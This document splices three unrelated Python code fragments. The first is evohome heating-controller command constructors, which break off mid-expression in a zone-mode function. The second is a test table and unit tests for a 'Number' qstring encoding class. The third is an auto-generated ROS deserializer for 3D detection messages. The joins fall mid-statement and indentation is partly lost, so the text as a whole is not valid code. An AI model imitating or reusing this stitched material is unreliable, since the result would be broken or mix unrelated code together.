    return cls(W_, _313F, payload, ctl_id, **kwargs)
@classmethod  # constructor for RQ/1100
@validate_api_params()
def get_tpi_params(cls, dev_id: str, domain_id=None, **kwargs):
    """Constructor to get the TPI params of a system (c.f. parser_1100)."""
    if domain_id is None:
        # default domain depends on the device type (13: vs others)
        domain_id = "00" if dev_id[:2] == "13" else "FC"
    return cls(RQ, _1100, domain_id, dev_id, **kwargs)
@classmethod  # constructor for W/1100
@validate_api_params()
def set_tpi_params(
    cls,
    ctl_id: str,
    domain_id: str,
    cycle_rate=3,  # TODO: check
    min_on_time=5,  # TODO: check
    min_off_time=5,  # TODO: check
    proportional_band_width=None,  # TODO: check
    **kwargs,
):
    """Constructor to set the TPI params of a system (c.f. parser_1100).

    :param cycle_rate: one of 3, 6, 9, 12; None means the default, 3.
    :param min_on_time: 1-5; None means the default, 5.
    :param min_off_time: 1-5; None means the default, 5.
    :param proportional_band_width: 1.5-3.0, or None (passed to temp_to_hex).

    BUGFIX: the asserts always permitted None for cycle_rate/min_on_time/
    min_off_time, but building the payload then crashed (None * 4); None is
    now coalesced to the defaults, as set_dhw_params already does.
    """
    # None means "use the default" for each parameter
    cycle_rate = 3 if cycle_rate is None else cycle_rate
    min_on_time = 5 if min_on_time is None else min_on_time
    min_off_time = 5 if min_off_time is None else min_off_time

    assert cycle_rate in (3, 6, 9, 12), cycle_rate
    assert 1 <= min_on_time <= 5, min_on_time
    assert 1 <= min_off_time <= 5, min_off_time
    assert (
        proportional_band_width is None or 1.5 <= proportional_band_width <= 3.0
    ), proportional_band_width
    payload = "".join(
        (
            f"{domain_id:02X}" if isinstance(domain_id, int) else domain_id,
            f"{cycle_rate * 4:02X}",  # encoded in quarter units
            f"{int(min_on_time * 4):02X}",  # encoded in quarter units
            f"{int(min_off_time * 4):02X}FF",
            # NOTE(review): presumably temp_to_hex(None) yields the "not set"
            # sentinel -- confirm
            f"{temp_to_hex(proportional_band_width)}01",
        )
    )
    return cls(W_, _1100, payload, ctl_id, **kwargs)
@classmethod  # constructor for RQ/000A
@validate_api_params(has_zone=True)
def get_zone_config(cls, ctl_id: str, zone_idx: Union[int, str], **kwargs):
    """Constructor to get the config of a zone (c.f. parser_000a)."""
    payload = f"{zone_idx:02X}00"  # TODO: is the trailing 00 needed?
    return cls(RQ, _000A, payload, ctl_id, **kwargs)
@classmethod  # constructor for W/000A
@validate_api_params(has_zone=True)
def set_zone_config(
    cls,
    ctl_id: str,
    zone_idx: Union[int, str],
    min_temp: float = 5,
    max_temp: float = 35,
    local_override: bool = False,
    openwindow_function: bool = False,
    multiroom_mode: bool = False,
    **kwargs,
):
    """Constructor to set the config of a zone (c.f. parser_000a).

    :param min_temp: minimum setpoint (5-21, per assert below).
    :param max_temp: maximum setpoint (21-35, per assert below).
    :param local_override: feature flag, encoded in the bitmap below.
    :param openwindow_function: feature flag, encoded in the bitmap below.
    :param multiroom_mode: feature flag, encoded in the bitmap below.
    """
    assert 5 <= min_temp <= 21, min_temp
    assert 21 <= max_temp <= 35, max_temp
    assert isinstance(local_override, bool), local_override
    assert isinstance(openwindow_function, bool), openwindow_function
    assert isinstance(multiroom_mode, bool), multiroom_mode
    # NOTE(review): bits appear to be SET when a feature is disabled
    # (bit 0 = local_override, bit 1 = openwindow, bit 4 = multiroom;
    # bits 2-3 unused here) -- confirm against parser_000a.
    bitmap = 0 if local_override else 1
    bitmap |= 0 if openwindow_function else 2
    bitmap |= 0 if multiroom_mode else 16
    # payload: zone | flag bitmap | min setpoint | max setpoint
    payload = "".join(
        (
            f"{zone_idx:02X}",
            f"{bitmap:02X}",
            temp_to_hex(min_temp),
            temp_to_hex(max_temp),
        )
    )
    return cls(W_, _000A, payload, ctl_id, **kwargs)
@classmethod  # constructor for RQ/2349
@validate_api_params(has_zone=True)
def get_zone_mode(cls, ctl_id: str, zone_idx: Union[int, str], **kwargs):
    """Constructor to get the mode of a zone (c.f. parser_2349)."""
    payload = f"{zone_idx:02X}00"  # TODO: is the trailing 00 needed?
    return cls(RQ, _2349, payload, ctl_id, **kwargs)
@classmethod # constructor for W/2349
@validate_api_params(has_zone=True)
def set_zone_mode(
cls,
ctl_id: str,
zone_idx: Union[int, str],
mode: str = None,
setpoint: float = None,
until: dt = None,
duration: int = None,
**kwargs,
):
"""Constructor to set/reset the mode of a zone (c.f. parser_2349).
The setpoint has a resolution of 0.1 C. If a setpoint temperature is required,
but none is provided, evohome will use the maximum possible value.
The until has a resolution of 1 min.
Incompatible combinations:
- mode == Follow & setpoint not None (will silently ignore setpoint)
- mode == Temporary & until is None (will silently ignore ???)
- until and duration are mutually exclusive
"""
# W --- 18:013393 01:145038 --:------ 2349 013 0004E201FFFFFF330B1A0607E4
# W --- 22:017139 01:140959 --:------ 2349 007 0801F400FFFFFF
mode = _normalise_mode(mode, setpoint, until, duration)
if setpoint is not None and not isinstance(setpoint, (float, int)):
raise TypeError(f"Invalid args: setpoint={setpoint}, but must be a float")
until, duration = _normalise_until(mode, setpoint, until, duration)
payload = "".join(
(
f"{zone_idx:02X}",
temp_to_hex(setpoint), # | |
-0.00000762939453125,'0q7E02_80')
f__q( -0.0000152587890625, '0q7E01_FF', '0q7E02') # alias for -256**-2
f__q(-math.pow(256, -2), '0q7E01_FF')
f__q( -0.0000152587890625, '0q7E01_FF')
f__q( -0.000030517578125, '0q7E01_FE')
f__q( -0.00006103515625, '0q7E01_FC')
f__q( -0.0001220703125, '0q7E01_F8')
f__q( -0.000244140625, '0q7E01_F0')
f__q( -0.00048828125, '0q7E01_E0')
f__q( -0.0009765625, '0q7E01_C0')
f__q( -0.001953125, '0q7E01_80')
f__q( -0.001953125, '0q7E01_80')
f__q( -0.0038604736328125, '0q7E01_03') # -253/65536
f__q( -0.003875732421875, '0q7E01_02') # -254/65536
f__q( -0.0038909912109375, '0q7E01_01') # -255/65536
f__q( -0.00390625, '0q7E00_FF', '0q7E01') # -256/65536 aka -1/256 aka -256**-1
f__q( -0.00390625, '0q7E00_FF') # -256/65536
f__q( -0.0039215087890625, '0q7E00_FEFF') # -257/65536
f__q( -0.003936767578125, '0q7E00_FEFE') # -258/65536
f__q( -0.0039520263671875, '0q7E00_FEFD') # -259/65536
f__q( -0.0078125, '0q7E00_FE')
f__q( -0.01171875, '0q7E00_FD')
f__q( -0.015625, '0q7E00_FC')
f__q( -0.03125, '0q7E00_F8')
f__q( -0.0625, '0q7E00_F0')
f__q( -0.125, '0q7E00_E0')
f__q( -0.25, '0q7E00_C0')
f__q( -0.5, '0q7E00_80')
f__q( -0.75, '0q7E00_40')
f__q( -0.875, '0q7E00_20')
f__q( -0.9375, '0q7E00_10')
f__q( -0.96875, '0q7E00_08')
f__q( -0.998046875, '0q7E00_0080')
f__q( -0.9998779296875, '0q7E00_0008')
f__q( -0.99999237060546875,'0q7E00_000080')
zone_boundary()
f__q( -1.0, '0q7D_FF', '0q7E') # alias for -1
f__q( -1.0, '0q7D_FF')
f__q( -1.000001, '0q7D_FEFFFFEF39085F50')
f__q( -1.00000762939453125,'0q7D_FEFFFF80')
f__q( -1.0001220703125, '0q7D_FEFFF8')
f__q( -1.000244140625, '0q7D_FEFFF0')
f__q( -1.00048828125, '0q7D_FEFFE0')
f__q( -1.0009765625, '0q7D_FEFFC0')
f__q( -1.001953125, '0q7D_FEFF80')
f__q( -1.00390625, '0q7D_FEFF')
f__q( -1.0078125, '0q7D_FEFE')
f__q( -1.015625, '0q7D_FEFC')
f__q( -1.03125, '0q7D_FEF8')
f__q( -1.0625, '0q7D_FEF0')
f__q( -1.1, '0q7D_FEE6666666666660') # TODO: Try more rational weirdos
f__q( -1.125, '0q7D_FEE0')
f__q( -1.25, '0q7D_FEC0')
f__q( -1.5, '0q7D_FE80')
f__q( -1.75, '0q7D_FE40')
f__q( -1.875, '0q7D_FE20')
f__q( -1.9375, '0q7D_FE10')
f__q( -1.96875, '0q7D_FE08')
f__q( -1.998046875, '0q7D_FE0080')
f__q( -1.9998779296875, '0q7D_FE0008')
f__q( -1.99999237060546875,'0q7D_FE000080')
f__q( -2.0, '0q7D_FE')
f__q( -2.00000762939453125,'0q7D_FDFFFF80')
f__q( -2.25, '0q7D_FDC0')
f__q( -2.5, '0q7D_FD80')
f__q( -2.75, '0q7D_FD40')
f__q( -3.0, '0q7D_FD')
f__q( -3.06249999999999645,'0q7D_FCF00000000001')
f__q( -3.0625, '0q7D_FCF0')
f__q( -3.062500000000005, '0q7D_FCEFFFFFFFFFFEA0')
f__q( -4.0, '0q7D_FC')
f__q( -8.0, '0q7D_F8')
f__q( -16.0, '0q7D_F0')
f__q( -32.0, '0q7D_E0')
f__q( -64.0, '0q7D_C0')
f__q( -128.0, '0q7D_80')
f__q( -255.0, '0q7D_01')
f__q( -255.5, '0q7D_0080')
f__q( -255.98046875, '0q7D_0005')
f__q( -255.984375, '0q7D_0004')
f__q( -255.98828125, '0q7D_0003')
f__q( -255.9921875, '0q7D_0002')
f__q( -255.99609375, '0q7D_0001')
f__q( -255.999984741210938, '0q7D_000001')
f__q( -255.999999940395355, '0q7D_00000001')
f__q( -255.999999999767169, '0q7D_0000000001')
f__q( -255.999999999999091, '0q7D_000000000001')
f__q( -255.999999999999943, '0q7D_00000000000010')
f__q( -255.999999999999972, '0q7D_00000000000008')
f__q( -256.0, '0q7C_FF', '0q7D') # alias for -256
f__q( -256.0, '0q7C_FF')
f__q( -256.00390625, '0q7C_FEFFFF')
f__q( -256.0078125, '0q7C_FEFFFE')
f__q( -256.01171875, '0q7C_FEFFFD')
f__q( -256.015625, '0q7C_FEFFFC')
f__q( -256.01953125, '0q7C_FEFFFB')
f__q( -257.0, '0q7C_FEFF')
f__q( -512.0, '0q7C_FE')
f__q( -1024.0, '0q7C_FC')
f__q( -2048.0, '0q7C_F8')
f__q( -4096.0, '0q7C_F0')
f__q( -8192.0, '0q7C_E0')
f__q( -16384.0, '0q7C_C0')
f__q( -32768.0, '0q7C_80')
f__q( -65536.0, '0q7B_FF', '0q7C') # alias for -256**2
f__q( -65536.0, '0q7B_FF')
f__q( -131072.0, '0q7B_FE')
f__q(-4294967296.0, '0q79_FF')
f__q(-2.04586912993508844e+149, '0q40_00000000000008')
f__q(-math.pow(2,992), '0q01_FF', '0q02') # alias for -256**124
f__q(-math.pow(2,992), '0q01_FF')
f__q(-math.pow(2,996), '0q01_F0')
f__q(-math.pow(2,997), '0q01_E0')
f__q(-math.pow(2,998), '0q01_C0')
f__q(-math.pow(2,999), '0q01_80')
f__q(-1.0715086071862672e+301, '0q01_00000000000008') # Boldest (furthest from one) reasonable number that floating point can represent
zone_boundary()
# f__q(math.pow(2,1000), '0q00FFFF83_01') # TODO: -2 ** +1000 == Gentlest (closest to one) negative Ludicrously Large integer.
zone_boundary()
f__q(float('-inf'), '0q00_7F', '0q00FF0000_FA0A1F01_01') # -2**99999999, a ludicrously large negative number
zone_boundary()
f__q(float('-inf'), '0q00_7F')
zone_boundary()
f__q(float('nan'), '0q')
def test_float_ludicrous_large(self):
    """Floats at the positive ludicrously-large boundary (2**1000)."""
    gentlest_ludicrous = 2.0 ** 1000  # smallest "ludicrous" magnitude
    boldest_reasonable = 2.0 ** 1000 - 2.0 ** 947  # largest "reasonable" float
    assert gentlest_ludicrous == 1.0715086071862673e+301
    assert boldest_reasonable == 1.0715086071862672e+301
    self.assertEqual('0qFE_FFFFFFFFFFFFF8', Number(boldest_reasonable).qstring())
    # NOTE: significand is 53 1-bits.
    if not LUDICROUS_NUMBER_SUPPORT:
        with self.assertRaises(NotImplementedError):
            Number(gentlest_ludicrous)
        with self.assertRaises(NotImplementedError):
            Number(sys.float_info.max)  # boldest ludicrously large float
            # THANKS: http://stackoverflow.com/a/3477332/673991
def test_float_ludicrous_large_negative(self):
    """Floats at the negative ludicrously-large boundary (-2**1000)."""
    gentlest_ludicrous = -2.0 ** 1000
    boldest_reasonable = -2.0 ** 1000 + 2.0 ** 947
    assert gentlest_ludicrous == -1.0715086071862673e+301
    assert boldest_reasonable == -1.0715086071862672e+301
    self.assertEqual('0q01_00000000000008', Number(boldest_reasonable).qstring())
    if not LUDICROUS_NUMBER_SUPPORT:
        with self.assertRaises(NotImplementedError):
            Number(gentlest_ludicrous)
        with self.assertRaises(NotImplementedError):
            Number(-sys.float_info.max)  # boldest ludicrously large negative float
def test_float_ludicrous_small(self):
    """
    Test floats near the positive ludicrously small boundary (2**-1000).

    In the naming of all these ludicrous/reasonable boundary test cases
    gentlest_ludicrous means
        closest to 1.0
        at the limit of the ludicrous numbers
        closest to the reasonable numbers
        furthest from 0.0 or infinity
    boldest_reasonable means
        furthest from 1.0
        at the limit of the reasonable numbers
        closest to 0.0 or infinity
        closest to the ludicrous numbers
    """
    gentlest_ludicrous = 2.0 ** -1000
    boldest_reasonable = 2.0 ** -1000 + 2.0 ** -1052
    # NOTE: Why -1052, not -1053?
    assert gentlest_ludicrous == 9.332636185032189e-302
    assert boldest_reasonable == 9.33263618503219e-302
    self.assertEqual('0q8183_0100000000000010', Number(boldest_reasonable).qstring())
    # NOTE: Significand is 1 1-bit, 51 0-bits, 1 1-bit.
    if not LUDICROUS_NUMBER_SUPPORT:
        # Ludicrously small values are currently accepted (truncated), not rejected:
        self.assertEqual('0q8183_01', Number(gentlest_ludicrous).qstring())
        # TODO:
        # with self.assertRaises(NotImplementedError):
        #     Number(gentlest_ludicrous)
        self.assertEqual('0q8180_04', Number(sys.float_info.min).qstring())  # boldest ludicrously small float
        # TODO:
        # with self.assertRaises(NotImplementedError):
        #     Number(sys.float_info.min)
def test_float_ludicrous_small_negative(self):
    """Floats at the negative ludicrously-small boundary (-2**-1000)."""
    gentlest_ludicrous = -2.0 ** -1000
    boldest_reasonable = -2.0 ** -1000 - 2.0 ** -1052
    assert gentlest_ludicrous == -9.332636185032189e-302
    assert boldest_reasonable == -9.33263618503219e-302
    self.assertEqual('0q7E7C_FEFFFFFFFFFFFFF0', Number(boldest_reasonable).qstring())
    # TODO: Enforce negative ludicrously small boundary -- or implement these ludicrous numbers:
    self.assertEqual('0q7E7C_FF', Number(gentlest_ludicrous).qstring())
    # with self.assertRaises(NotImplementedError):
    #     Number(gentlest_ludicrous)
    self.assertEqual('0q7E7F_FC', Number(-sys.float_info.min).qstring())
    # with self.assertRaises(NotImplementedError):
    #     Number(-sys.float_info.min)
def test_copy_constructor(self):
    """A Number can be constructed from another Number."""
    for qstring in ('0q83_03E8', '0q7C_FEFF'):
        self.assertEqual(qstring, Number(Number(qstring)).qstring())
def test_copy_constructor_ancestored(self):
    """Copy-construction propagates up the type hierarchy."""
    class SonOfNumber(Number):
        pass
    for qstring in ('0q83_03E8', '0q7C_FEFF'):
        self.assertEqual(qstring, Number(SonOfNumber(qstring)).qstring())
def test_copy_constructor_inherited(self):
    """Copy-construction propagates down the type hierarchy."""
    class SonOfNumber(Number):
        pass
    for qstring in ('0q83_03E8', '0q7C_FEFF'):
        self.assertEqual(qstring, SonOfNumber(Number(qstring)).qstring())
def test_copy_constructor_related(self):
    """Copy-construction propagates across the type hierarchy (siblings, cousins)."""
    class SonOfNumber(Number):
        pass
    class DaughterOfNumber(Number):
        pass
    # sanity: the two subclasses are unrelated to each other
    self.assertIsInstance(SonOfNumber(), Number)
    self.assertIsInstance(DaughterOfNumber(), Number)
    self.assertNotIsInstance(SonOfNumber(), DaughterOfNumber)
    self.assertNotIsInstance(DaughterOfNumber(), SonOfNumber)
    # siblings interconvert
    self.assertEqual('0q83_03E8', SonOfNumber(DaughterOfNumber('0q83_03E8')).qstring())
    self.assertEqual('0q7C_FEFF', DaughterOfNumber(SonOfNumber('0q7C_FEFF')).qstring())
    # noinspection PyClassHasNoInit
    class GrandSonOfNumber(SonOfNumber):
        pass
    # noinspection PyClassHasNoInit
    class GrandDaughterOfNumber(DaughterOfNumber):
        pass
    # cousins interconvert too
    self.assertEqual('0q83_03E8', GrandSonOfNumber(GrandDaughterOfNumber('0q83_03E8')).qstring())
    self.assertEqual('0q7C_FEFF', GrandDaughterOfNumber(GrandSonOfNumber('0q7C_FEFF')).qstring())
def test_copy_constructor_by_value(self):
    """Make sure the copy constructor copies by value, not reference."""
    original = Number(1)
    duplicate = Number(original)
    self.assertEqual('0q82_01', original.qstring())
    self.assertEqual('0q82_01', duplicate.qstring())
    original.raw = Number(9).raw  # mutate the source after copying
    self.assertEqual('0q82_09', original.qstring())
    self.assertEqual('0q82_01', duplicate.qstring())  # the copy is unaffected
def test_assignment_by_reference(self):
    """Make sure plain assignment copies by reference, not by value."""
    # TODO: Make Number an immutable class, so assignment is by value?
    # SEE: Immutable objects, http://stackoverflow.com/q/4828080/673991
    original = Number(1)
    alias = original
    original.raw = Number(9).raw
    self.assertEqual('0q82_09', alias.qstring())  # alias sees the mutation
def test_sizeof(self):
    """Illicit snooping into how big these things are.

    The per-instance size varies by platform, Python version, and whether
    Number.__slots__ contains _zone, so any of the observed values passes.
    Note the size does NOT grow with qstring length (raw is a separate object).
    """
    expected_sizes = (
        28,  # Windows 7, 64-bit desktop, Python 2.7.9-12
        32,  # Windows 7, 64-bit desktop, Python 3.5.1-2
        40,  # Windows 7, 64-bit desktop, Python 2.7.12 after hardcoding __slots__ to _raw, _zone
        56,  # Windows 7, 64-bit laptop, Python 2.7.12, 3.5.2
        64,  # macOS 10, 64-bit macbook, Python 2.7.10
        72,  # Windows 7, 64-bit desktop, Python 3.6 after hardcoding __slots__ to _raw, _zone
        80,  # macOS 10, 64-bit macbook, Python 2.7.16 (Number slots _raw, _zone)
    )  # depends on Number.__slots__ containing _zone or not
    self.assertIn(sys.getsizeof(Number('0q')), expected_sizes)
    self.assertIn(sys.getsizeof(Number('0q80')), expected_sizes)
    self.assertIn(sys.getsizeof(Number('0q83_03E8')), expected_sizes)
    self.assertIn(sys.getsizeof(Number('0q83_03E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8')), expected_sizes)
    self.assertIn(sys.getsizeof(Number('0q83_03E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
                                       'E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
                                       'E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
                                       'E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
                                       'E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
                                       'E8E8E8E8E8E8E8E8E8E8E8')), expected_sizes)
    # Testing getsizeof() on raw was a dumb idea. Anyway it broke over some distinction between laptop and desktop.
    # self.assertEqual(py2312( 21, 17, 33), sys.getsizeof(Number('0q').raw))
    # self.assertEqual(py2312( 22, 18, 34), sys.getsizeof(Number('0q80').raw))
    # self.assertEqual(py2312( 23, 19, 35), sys.getsizeof(Number('0q82_01').raw))
    # self.assertEqual(py2312( 24, 20, 36), sys.getsizeof(Number('0q83_03E8').raw))
    # self.assertEqual(py2312( 25, 21, 37), sys.getsizeof(Number('0q82_018888').raw))
    # self.assertEqual(py2312( 45, 41, 57), sys.getsizeof(Number('0q83_03E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8').raw))
    # self.assertEqual(py2312(144,140,156), sys.getsizeof(Number('0q83_03E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8').raw))
    #
    # self.assertEqual(py2312(21, 17, 33), sys.getsizeof(b''))
    # self.assertEqual(py2312(22, 18, 34), sys.getsizeof(b'\x80'))
    # self.assertEqual(py2312(24, 20, 36), sys.getsizeof(b'\x83\x03\xE8'))
    # self.assertEqual(py2312(45, 41, 57), sys.getsizeof(b'\x83\x03\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8'))
def test_uneven_hex(self):
    """An odd count of hex digits behaves as if padded with a trailing zero."""
    self.assertEqual(Number('0q82_028'), Number('0q82_0280'))
    for uneven in ('0q8', '0q8_', '0q_8'):
        self.assertEqual('0q80', Number(uneven).qstring())
def test_bad_string_hex(self):
    """Valid hex digits parse; invalid hex digits raise."""
    for good in ('0q', '0q80', '0q82_FF'):
        Number(good)  # must not raise
    for bad in ('0q8X', '0q82_FG'):
        with self.assertRaises(Number.ConstructorValueError):
            Number(bad)
def test_bad_string_prefix(self):
    """A qstring must start with exactly the '0q' prefix."""
    Number('0q')  # must not raise
    Number('0q80')
    for bad in ('', '00q80', 'q80'):
        with self.assertRaises(Number.ConstructorValueError):
            Number(bad)
def test_string_int(self):
    """Integer strings convert exactly -- digits beyond float precision are kept."""
    self.assertEqual(1, Number("1"))
    self.assertEqual(0, Number("0"))
    self.assertEqual(-1, Number("-1"))
    self.assertEqual( 11111111111111111, Number("11111111111111111"))
    self.assertEqual( 11111111111111112, int(float("11111111111111111")))  # float rounds here
    self.assertEqual(111111111111111111, Number("111111111111111111"))
    self.assertEqual(111111111111111104, int(float("111111111111111111")))  # float rounds here
    self.assertEqual(11111111111111111111111111111111111111, Number("11111111111111111111111111111111111111"))
    self.assertEqual(11111111111111110860978869272892669952, int(float("11111111111111111111111111111111111111")))  # float rounds here
def test_string_numeric_Eric_Leschinski(self):
    """
    Testing the example number formats (for Python float()) as described by Eric Leschinski.

    SPECIAL THANKS: http://stackoverflow.com/a/20929983/673991
    """
    with self.assertRaises(Number.ConstructorValueError):
        Number("")
    self.assertEqual(127, Number("127"))
    self.assertEqual(1, Number(True))
    # with self.assertRaises(Number.ConstructorTypeError):
    #     Number(True)  # Even though float(True) == 1.0?
    with self.assertRaises(Number.ConstructorValueError):
        Number("True")
    self.assertEqual(0, Number(False))
    # with self.assertRaises(Number.ConstructorTypeError):
    #     Number(False)
    self.assertEqual(123.456, Number("123.456"))
    self.assertEqual(-127, Number(" -127 "))  # surrounding whitespace is accepted
    self.assertEqual(12, Number("\t\n12\r\n"))
    self.assertEqual(Number.NAN, Number("NaN"))
    with self.assertRaises(Number.ConstructorValueError):
        Number("NaNanananaBATMAN")
    self.assertEqual(Number.NEGATIVE_INFINITY, Number("-iNF"))  # mixed case accepted
    self.assertEqual(123.0e4, Number("123.E4"))
    self.assertEqual(0.1, Number(".1"))
    with self.assertRaises(Number.ConstructorValueError):
        Number("1,234")  # no thousands separators
    self.assertEqual(0, Number(u'\x30'))  # u'0'
    with self.assertRaises(Number.ConstructorValueError):
        Number("NULL")
    self.assertEqual(0x3fade, Number(0x3fade))
    self.assertEqual(Number.POSITIVE_INFINITY, Number("6e7777777777777"))  # TODO: Ludicrous Number
    self.assertEqual(1.797693e+300, Number("1.797693e+300"))  # TODO: MAX_FLOAT support (e+308)
    self.assertEqual(Number.POSITIVE_INFINITY, Number("inf"))
    self.assertEqual(Number.POSITIVE_INFINITY, Number("infinity"))
    with self.assertRaises(Number.ConstructorValueError):
        Number("infinityandBEYOND")
    with self.assertRaises(Number.ConstructorValueError):
        Number("12.34.56")
    with self.assertRaises(Number.ConstructorValueError):
        Number(u'四')
    with self.assertRaises(Number.ConstructorValueError):
        Number("#56")
    with self.assertRaises(Number.ConstructorValueError):
        Number("56%")
    self.assertEqual(0e0, Number("0E0"))
    self.assertEqual(1, Number(0**0))
    self.assertEqual(-5e-5, Number("-5e-5"))
    self.assertEqual(+1e1, Number("+1e1"))
    with self.assertRaises(Number.ConstructorValueError):
        Number("+1e1^5")
    with self.assertRaises(Number.ConstructorValueError):
        Number("+1e1.3")
    with self.assertRaises(Number.ConstructorValueError):
        Number("-+1")
    with self.assertRaises(Number.ConstructorValueError):
        Number("(1)")
def test_string_numeric_space_after_minus(self):
    """Whitespace between the minus sign and the digits: Python-version dependent."""
    if six.PY2:
        self.assertEqual(-42, Number("- 42"))
        # NOTE: Python 2 int() is crazy permissive with space after minus.
    else:
        with self.assertRaises(Number.ConstructorValueError):
            Number("- 42")
    with self.assertRaises(Number.ConstructorValueError):
        Number("- 42.0")
        # NOTE: float() sensibly rejects space after minus at any version.
def test_string_numeric_more_errors(self):
    """More malformed numeric strings that must be rejected."""
    for bad in ("2+2", "0-0", "0 0", "--0", " "):
        with self.assertRaises(Number.ConstructorValueError):
            Number(bad)
def test_string_numeric_more_formats(self):
self.assertEqual(32, Number("0x20"))
self.assertEqual(0, Number("-0"))
| |
len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
else:
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v12.is_dense
buff.write(_get_struct_B().pack(_x))
_x = val1.is_tracking
buff.write(_get_struct_B().pack(_x))
_x = val1.tracking_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
  def deserialize(self, str):
    """
    unpack serialized message in str into this message instance
    :param str: byte array of serialized message, ``str``
    """
    # NOTE: auto-generated ROS (genpy) deserialization code.  The parameter
    # name `str` is the serialized byte buffer; the generated name shadows
    # the builtin.  Layout must mirror serialize()/serialize_numpy() exactly.
    if python3:
      codecs.lookup_error("rosmsg").msg_type = self._type
    try:
      if self.header is None:
        self.header = std_msgs.msg.Header()
      # NOTE(review): generated no-op -- detections is re-assigned to [] below.
      if self.detections is None:
        self.detections = None
      end = 0
      _x = self
      # std_msgs/Header: seq + stamp.secs + stamp.nsecs (3 x uint32 = 12 bytes)
      start = end
      end += 12
      (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
      # length-prefixed frame_id string
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
      else:
        self.header.frame_id = str[start:end]
      # detections: length-prefixed array of vision_msgs/Detection3D
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      self.detections = []
      for i in range(0, length):
        val1 = vision_msgs.msg.Detection3D()
        # per-detection header (seq, stamp, frame_id)
        _v15 = val1.header
        start = end
        end += 4
        (_v15.seq,) = _get_struct_I().unpack(str[start:end])
        _v16 = _v15.stamp
        _x = _v16
        start = end
        end += 8
        (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        start = end
        end += length
        if python3:
          _v15.frame_id = str[start:end].decode('utf-8', 'rosmsg')
        else:
          _v15.frame_id = str[start:end]
        # results: array of ObjectHypothesisWithPose
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        val1.results = []
        for i in range(0, length):
          val2 = vision_msgs.msg.ObjectHypothesisWithPose()
          start = end
          end += 4
          (length,) = _struct_I.unpack(str[start:end])
          start = end
          end += length
          if python3:
            val2.id = str[start:end].decode('utf-8', 'rosmsg')
          else:
            val2.id = str[start:end]
          start = end
          end += 8
          (val2.score,) = _get_struct_d().unpack(str[start:end])
          # pose with covariance: position (3 x float64) + quaternion (4 x float64)
          _v17 = val2.pose
          _v18 = _v17.pose
          _v19 = _v18.position
          _x = _v19
          start = end
          end += 24
          (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
          _v20 = _v18.orientation
          _x = _v20
          start = end
          end += 32
          (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
          # 6x6 covariance matrix: 36 float64 = 288 bytes
          start = end
          end += 288
          _v17.covariance = _get_struct_36d().unpack(str[start:end])
          val1.results.append(val2)
        # bbox: center pose (position + orientation) and size vector
        _v21 = val1.bbox
        _v22 = _v21.center
        _v23 = _v22.position
        _x = _v23
        start = end
        end += 24
        (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
        _v24 = _v22.orientation
        _x = _v24
        start = end
        end += 32
        (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
        _v25 = _v21.size
        _x = _v25
        start = end
        end += 24
        (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
        # source_cloud: sensor_msgs/PointCloud2 (header, dims, fields, data)
        _v26 = val1.source_cloud
        _v27 = _v26.header
        start = end
        end += 4
        (_v27.seq,) = _get_struct_I().unpack(str[start:end])
        _v28 = _v27.stamp
        _x = _v28
        start = end
        end += 8
        (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        start = end
        end += length
        if python3:
          _v27.frame_id = str[start:end].decode('utf-8', 'rosmsg')
        else:
          _v27.frame_id = str[start:end]
        _x = _v26
        start = end
        end += 8
        (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
        # fields: array of sensor_msgs/PointField
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        _v26.fields = []
        for i in range(0, length):
          val3 = sensor_msgs.msg.PointField()
          start = end
          end += 4
          (length,) = _struct_I.unpack(str[start:end])
          start = end
          end += length
          if python3:
            val3.name = str[start:end].decode('utf-8', 'rosmsg')
          else:
            val3.name = str[start:end]
